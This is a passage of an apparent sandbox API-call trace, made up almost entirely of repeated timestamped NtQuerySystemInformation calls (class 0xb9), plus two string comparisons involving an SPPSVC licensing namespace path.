SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdec0, Length=0x28, ResultLength=0x0) [0263.348] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x28, ResultLength=0x0) [0263.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x28, ResultLength=0x0) [0263.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x28, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdec0, Length=0x28, ResultLength=0x0) [0263.357] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0263.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x28, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x28, ResultLength=0x0) [0263.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x28, ResultLength=0x0) [0263.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0263.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0263.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x50, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x50, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x50, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbc0, Length=0x50, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbc0, Length=0x50, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbc0, Length=0x50, ResultLength=0x0) [0263.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbc0, Length=0x50, ResultLength=0x0) [0263.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x38, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x28, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x38, ResultLength=0x0) [0263.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda10, Length=0x28, ResultLength=0x0) [0263.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda10, Length=0x28, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x20, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x38, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x38, ResultLength=0x0) [0263.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd970, Length=0x20, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf30, Length=0x50, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf30, Length=0x50, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf30, Length=0x50, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde20, Length=0x50, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde20, Length=0x50, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde20, Length=0x50, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde20, Length=0x50, ResultLength=0x0) [0263.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x38, ResultLength=0x0) [0263.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x38, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x28, ResultLength=0x0) [0263.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x28, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, 